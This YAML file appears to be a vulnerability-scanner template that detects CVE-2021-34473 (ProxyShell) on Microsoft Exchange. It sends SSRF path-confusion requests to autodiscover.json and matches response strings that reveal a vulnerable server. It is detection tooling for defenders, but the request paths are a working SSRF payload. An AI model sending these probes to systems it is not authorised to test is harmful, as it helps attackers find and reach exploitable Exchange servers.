27 lines
1.1 KiB
YAML
27 lines
1.1 KiB
YAML
id: CVE-2021-34473
|
|
|
|
info:
|
|
name: Exchange Server SSRF (ProxyShell)
|
|
author: arcc,intx0x80,dwisiswant0,r3dg33k
|
|
severity: critical
|
|
description: |
|
|
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206.
|
|
reference:
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473
|
|
- https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
|
|
- https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1
|
|
tags: cve,cve2021,ssrf,rce,exchange
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com'
|
|
- '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com'
|
|
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
condition: or
|
|
words:
|
|
- "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException"
|
|
- "Exchange MAPI/HTTP Connectivity Endpoint" |